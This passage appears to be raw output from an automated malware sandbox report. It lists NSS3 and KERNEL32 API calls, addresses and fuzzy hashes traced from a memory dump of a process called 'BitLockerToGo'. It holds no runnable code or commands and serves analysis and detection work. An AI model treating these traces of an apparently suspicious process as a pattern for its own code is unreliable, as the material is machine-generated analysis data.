                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C657E0E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2305085145-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D11
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D2A
                                                                                                                                                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D4A
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D57
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D97
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4DBA
                                                                                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C5C4DD4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4DE6
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4DEF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3388019835-0
APIs
• PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FAF
• PR_Now.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FD1
• TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FFA
• EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669013
• PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669042
• TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C66905A
• EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669073
• PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6690EC
  • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
  • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
• PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669111
Strings
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
• String ID: nul
• API String ID: 2831689957-3076721864
APIs
• PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C64E93B
• PR_SetError.NSS3(FFFFE075,00000000), ref: 6C64E94E
• PORT_Alloc_Util.NSS3(00000001), ref: 6C64E995
• memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C64E9A7
• strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C64E9CA
• PORT_Strdup_Util.NSS3(6C78933E), ref: 6C64EA17
• PORT_Alloc_Util.NSS3(00000001), ref: 6C64EA28
  • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
  • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
• memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C64EA3C
• free.MOZGLUE(?), ref: 6C64EA69
Strings
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
• String ID: http://
• API String ID: 3982757857-1121587658
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757CE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757D36
                                                                                                                                                                                                                                                                                                                                                          • PR_Realloc.NSS3(?,00000080), ref: 6C757D6D
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757D8B
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C757DC2
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757DD8
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000080), ref: 6C757DF8
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757E06
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6acd421e92309261129fc801c86c3ba63913a8ec1983964586bf51176af1b012
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 35836bae8df422eb0b0e3146c401cac1efb81267fc922199a8886d23e00a9301
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6acd421e92309261129fc801c86c3ba63913a8ec1983964586bf51176af1b012
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141F9B16102059FDB04CF28CE95D6B37BAFF81318B55856CE8198B751DB31E921CBA1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C664E90
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C664EA9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C664EC6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C664EDF
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3 ref: 6C664EF8
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C664F05
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C664F13
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C664F3A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                                                                                                                          • String ID: bUfl$bUfl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 326028414-2796572053
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a01fdeecdc9345af2e47ec5c157ae990df4dace2c84bfcc9b40d66d093dc2f65
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dec16062c4ba6fff451d5829aaaad7b8dff0da0f0909e516ece29e53a9f08a73
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01fdeecdc9345af2e47ec5c157ae990df4dace2c84bfcc9b40d66d093dc2f65
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3413DB4A04605DFCB00DF79C1848AABBF0FF89354B118569EC599B710EB30E855CBD5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C68DE64), ref: 6C68ED0C
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C68ED22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C68ED4A
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C68ED6B
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C68ED38
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C68ED52
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C68ED83
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C68ED95
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C68ED9D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C6A127C,00000000,00000000,00000000), ref: 6C6A650E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 61f58c0e67d1202e8ad4af2ba8652d040477e4c3202a2eae99b2d1e777266e55
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3532c6d7b8132fdf7b85404953b3bc06b16ff7b344697efb1476b53b378fd84
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61f58c0e67d1202e8ad4af2ba8652d040477e4c3202a2eae99b2d1e777266e55
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC110579A01204ABEB1056A9AC44FBF72B8AF4270CF014524EC1562E41F724EA0E86FE
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Aborting,?,6C632357), ref: 6C750EB8
                                                                                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C632357), ref: 6C750EC0
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C750EE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_Now.NSS3 ref: 6C750A22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C750A35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C750A66
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_GetCurrentThread.NSS3 ref: 6C750A70
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C750A9D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C750AC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_vsmprintf.NSS3(?,?), ref: 6C750AE8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: EnterCriticalSection.KERNEL32(?), ref: 6C750B19
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C750B48
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C750C76
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_LogFlush.NSS3 ref: 6C750C7E
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C750EFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C63AF0E
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F16
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F1C
                                                                                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F25
                                                                                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F2B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4182cb20f92afe347bb9bd20a66ccef9a677d657138a7e2c3bfbe4e16214ea70
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 77f8697e6a15235020f1f2f18321d41881a9f3fc97aa4fd0506578252a2d3a34
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4182cb20f92afe347bb9bd20a66ccef9a677d657138a7e2c3bfbe4e16214ea70
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0AFF69001187BDE003FA09D4EC9B3E2DDF86269F444434FE0956612DA36EA2596B2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C6B4DCB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C6B4DE1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C6B4DFF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6B4E59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C77300C,00000000), ref: 6C6B4EB8
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C6B4EFF
                                                                                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C6B4F56
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6B521A
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 38dd3c6f749b551242fcad5c14a69239ef5aff925577fbf4c687fbbd5829ae8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 021b4e88e6e980d8950850577f8965bfcba4509b8a6d2d035e0ea000cdb998c3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38dd3c6f749b551242fcad5c14a69239ef5aff925577fbf4c687fbbd5829ae8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F18B71E00209CBDB04CF54D8407AEB7B2FF89358F254129E915BB781EB75E992CB98
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C790148,?,6C656FEC), ref: 6C64502A
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C790148,?,6C656FEC), ref: 6C645034
                                                                                                                                                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C69FE80,6C69FD30,6C6EC350,00000000,00000000,00000001,00000000,6C790148,?,6C656FEC), ref: 6C645055
                                                                                                                                                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C69FE80,6C69FD30,6C6EC350,00000000,00000000,?,00000001,00000000,6C790148,?,6C656FEC), ref: 6C64506D
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: HashLockTable
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3862423791-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 198e17858db5a8df630c1a38eaad225546cbac4cd4032a9b1f01e41b6db34191
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 055ad848523c31666c639629a66e0a5ec07d4baf142ad564e2df432ced3d3cc3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 198e17858db5a8df630c1a38eaad225546cbac4cd4032a9b1f01e41b6db34191
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2331B5B5B092109BDB109EA6E84CB4F37B8EB1379DF21C135E90987A40D3748805CBE9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5E2F3D
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C5E2FB9
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C5E3005
